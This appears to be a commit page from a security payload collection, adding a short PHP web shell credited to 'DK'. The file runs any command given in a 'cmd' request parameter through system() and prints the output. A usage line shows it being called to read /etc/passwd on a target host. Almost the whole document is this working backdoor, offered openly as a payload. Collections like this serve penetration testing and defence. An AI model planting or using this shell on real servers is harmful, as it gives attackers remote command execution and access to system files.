Moar structure.

This commit is contained in:
Daniel Miessler
2015-08-04 11:17:26 -07:00
parent a6dc96fe81
commit 63282bf2cf
35 changed files with 0 additions and 1 deletions

View File

@@ -0,0 +1,17 @@
<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
<!-- http://michaeldaw.org 2006 -->